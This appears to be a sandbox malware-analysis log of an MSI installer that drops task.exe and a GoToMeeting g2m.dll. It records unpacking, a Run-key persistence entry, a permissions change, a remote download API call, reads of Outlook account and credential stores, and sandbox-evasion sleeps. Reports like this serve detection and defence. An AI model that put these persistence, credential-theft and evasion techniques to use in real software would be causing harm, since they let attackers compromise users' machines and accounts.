                  Source: C:\Users\user\task.exe Section loaded: apphelp.dll, g2m.dll, winmm.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, wininet.dll, iphlpapi.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, sspicli.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, dpapi.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, version.dll, wininet.dll, windows.storage.dll, wldp.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, pstorec.dll, vaultcli.dll, wintypes.dll, dpapi.dll, msasn1.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, pstorec.dll, sspicli.dll, msasn1.dll, windows.storage.dll, wldp.dll, msasn1.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                  Source: C:\Users\user\task.exe Section loaded: g2m.dll, winmm.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, wininet.dll, iphlpapi.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, mswsock.dll
                  Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, uxtheme.dll, windows.storage.dll, wldp.dll, sspicli.dll, mpr.dll, powrprof.dll, umpdc.dll, wbemcomn.dll, mswsock.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll, netapi32.dll, netutils.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll, dpapi.dll, uxtheme.dll, wkscli.dll, cscapi.dll, kernel.appcore.dll
                  Source: C:\Program Files\Windows Media Player\wmplayer.exe Section loaded: cryptbase.dll, mswsock.dll, uxtheme.dll
                  Source: C:\Windows\System32\dllhost.exe Section loaded: cryptbase.dll, iphlpapi.dll, mswsock.dll, dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Windows\SysWOW64\msiexec.exe File written: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\msiwrapper.ini
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\task.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: wE1inOhJA5.msi Static file information: File size 1753088 > 1048576
                  Source: Binary string: your_package_name.pdbG source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp, task.exe, 00000008.00000003.1472143930.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp, task.exe, 0000001E.00000002.4491311882.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: wkernel32.pdb source: task.exe, 00000019.00000003.1667788844.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1667935272.0000000002C70000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676696250.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676535563.0000000005430000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1572618363.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdb source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: your_package_name.pdbI source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: task.exe, 0000001A.00000002.1666589979.000000000061C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: your_package_name.pdb source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp, task.exe, 00000008.00000003.1472143930.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp, task.exe, 0000001E.00000002.4491311882.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: wkernelbase.pdbUGP source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wkernel32.pdbUGP source: task.exe, 00000019.00000003.1667788844.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1667935272.0000000002C70000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676696250.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676535563.0000000005430000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: expand.exe, 00000006.00000003.1433042313.000000000482F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1572618363.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000008.00000002.1571419937.0000000000402000.00000002.00000001.01000000.00000005.sdmp, task.exe, 00000008.00000000.1439408986.0000000000402000.00000002.00000001.01000000.00000005.sdmp, task.exe, 00000016.00000000.1579511832.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000016.00000002.4486274195.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000018.00000000.1650674244.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000019.00000002.1675825905.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001A.00000000.1651000866.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001B.00000000.1652070836.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001E.00000002.4486356902.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001E.00000000.1662738715.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.* source: task.exe, 0000001A.00000002.1666589979.0000000000608000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Users\user\task.exe Unpacked PE file: 24.2.task.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\task.exe Unpacked PE file: 26.2.task.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\task.exe Unpacked PE file: 27.2.task.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: 32.3.svchost.exe.1be856bc070.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                  Source: 32.3.svchost.exe.1be856bc070.1.raw.unpack, Runtime.cs .Net Code: CoreMain
                  Source: 32.3.svchost.exe.1be856bc070.0.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                  Source: 32.3.svchost.exe.1be856bc070.0.raw.unpack, Runtime.cs .Net Code: CoreMain
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Code function: 8_2_6C8DB840 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex, 8_2_6C8DB840
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Code function: 8_2_6C8C8720 push eax; mov dword ptr [esp], 00000007h 8_2_6C8C8721
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Code function: 8_2_6C904201 push ecx; ret 8_2_6C904214
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Code function: 8_2_6C8B1830 push eax; mov dword ptr [esp], 00000000h 8_2_6C8B1831
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Code function: 8_2_6C8CB0C0 push eax; mov dword ptr [esp], 00000000h 8_2_6C8CB0C1
                  Source: C:\Users\user\task.exe Code function: 22_2_6FE68720 push eax; mov dword ptr [esp], 00000007h 22_2_6FE68721
                  Source: C:\Users\user\task.exe Code function: 22_2_6FEA4201 push ecx; ret 22_2_6FEA4214
                  Source: C:\Users\user\task.exe Code function: 22_2_6FE51830 push eax; mov dword ptr [esp], 00000000h 22_2_6FE51831
                  Source: C:\Users\user\task.exe Code function: 22_2_6FE6B0C0 push eax; mov dword ptr [esp], 00000000h 22_2_6FE6B0C1
                  Source: C:\Users\user\task.exe Code function: 22_2_000B3076 push ecx; ret 22_2_000B3089
                  Source: C:\Users\user\task.exe Code function: 22_2_00092826 push ecx; ret 22_2_00092839
                  Source: C:\Users\user\task.exe Code function: 22_2_000B3998 push eax; ret 22_2_000B39B6
                  Source: C:\Users\user\task.exe Code function: 22_2_10002806 push ecx; ret 22_2_10002819
                  Source: C:\Users\user\task.exe Code function: 22_2_02582291 push ecx; ret 22_2_025822A4
                  Source: C:\Users\user\task.exe Code function: 22_2_0255811E push ebx; ret 22_2_0255811F
                  Source: C:\Users\user\task.exe Code function: 22_2_0255C78E pushfd ; retf 22_2_0255C78F
                  Source: C:\Users\user\task.exe Code function: 22_2_025A3403 push eax; ret 22_2_025A3421
                  Source: C:\Users\user\task.exe Code function: 22_2_02572496 push esi; ret 22_2_02572498
                  Source: C:\Users\user\task.exe Code function: 22_2_025A2AE1 push ecx; ret 22_2_025A2AF4
                  Source: C:\Users\user\task.exe Code function: 22_2_025C5C6B push edx; ret 22_2_025C5CDB
                  Source: C:\Users\user\task.exe Code function: 24_2_0044693D push ecx; ret 24_2_0044694D
                  Source: C:\Users\user\task.exe Code function: 24_2_0044DB70 push eax; ret 24_2_0044DB84
                  Source: C:\Users\user\task.exe Code function: 24_2_0044DB70 push eax; ret 24_2_0044DBAC
                  Source: C:\Users\user\task.exe Code function: 24_2_00451D54 push eax; ret 24_2_00451D61
                  Source: C:\Users\user\task.exeCode function: 22_2_00066F61 ShellExecuteW,URLDownloadToFileW,22_2_00066F61
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI509A.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\67a1ae3c4a36f34f89fd14e4fff5e74c.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\g2m.dll (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\task.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\g2m.dllJump to dropped file

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\task.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\g2m.dllJump to dropped file
                  Source: C:\Users\user\task.exeCode function: 22_2_00078D0C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_00078D0C
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run appsJump to behavior
                  Source: C:\Users\user\task.exeCode function: 22_2_0007AD7F LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,22_2_0007AD7F
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\task.exeCode function: 22_2_0006E304 Sleep,ExitProcess,22_2_0006E304
                  Source: C:\Users\user\task.exeAPI/Special instruction interceptor: Address: 7FF90818D044
                  Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D044
                  Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 56FB83A
                  Source: task.exe, 00000016.00000003.1649617657.0000000000874000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMECFF EXPLORER.EXE:
                  Source: task.exe, 00000016.00000003.1652380221.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649253542.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652045010.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652977874.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649057788.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650539674.0000000003F3A000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652572952.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649361427.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651396491.0000000004015000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648863747.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000002.4497721588.0000000004179000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                  Source: task.exe, 00000016.00000003.1652380221.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649253542.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652045010.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652977874.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649057788.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650539674.0000000003F3A000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652572952.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649361427.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651396491.0000000004015000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648863747.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000002.4497721588.0000000004179000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\task.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Users\user\task.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,22_2_00078A3A
                  Source: C:\Users\user\task.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\task.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\task.exeWindow / User API: threadDelayed 4633Jump to behavior
                  Source: C:\Users\user\task.exeWindow / User API: threadDelayed 5346Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI509A.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmpJump to dropped file
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep count: 4633 > 30Jump to behavior
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep time: -13899000s >= -30000sJump to behavior
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep count: 5346 > 30Jump to behavior
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep time: -16038000s >= -30000sJump to behavior
                  Source: C:\Users\user\task.exe TID: 5940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\task.exe TID: 4712Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8FB0E1 FindFirstFileExW,8_2_6C8FB0E1
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE9B0E1 FindFirstFileExW,22_2_6FE9B0E1
                  Source: C:\Users\user\task.exeCode function: 22_2_0006BF45 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,22_2_0006BF45
                  Source: C:\Users\user\task.exeCode function: 22_2_0006919E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_0006919E
                  Source: C:\Users\user\task.exeCode function: 22_2_00068290 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,22_2_00068290
                  Source: C:\Users\user\task.exeCode function: 22_2_000672F0 FindFirstFileW,FindNextFileW,22_2_000672F0
                  Source: C:\Users\user\task.exeCode function: 22_2_0007A467 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,22_2_0007A467
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B6E8 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0006B6E8
                  Source: C:\Users\user\task.exeCode function: 22_2_000A97E9 FindFirstFileExA,22_2_000A97E9
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B903 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0006B903
                  Source: C:\Users\user\task.exeCode function: 22_2_00068D46 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_00068D46
                  Source: C:\Users\user\task.exeCode function: 22_2_00077DE7 FindFirstFileW,FindNextFileW,FindNextFileW,22_2_00077DE7
                  Source: C:\Users\user\task.exeCode function: 22_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,22_2_100010F1
                  Source: C:\Users\user\task.exeCode function: 22_2_10006580 FindFirstFileExA,22_2_10006580
                  Source: C:\Users\user\task.exeCode function: 24_2_0040AE51 FindFirstFileW,FindNextFileW,24_2_0040AE51
                  Source: C:\Users\user\task.exeCode function: 22_2_0006771B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,22_2_0006771B
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8C93B0 GetSystemInfo,8_2_6C8C93B0
                  Source: C:\Users\user\task.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                  Source: svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
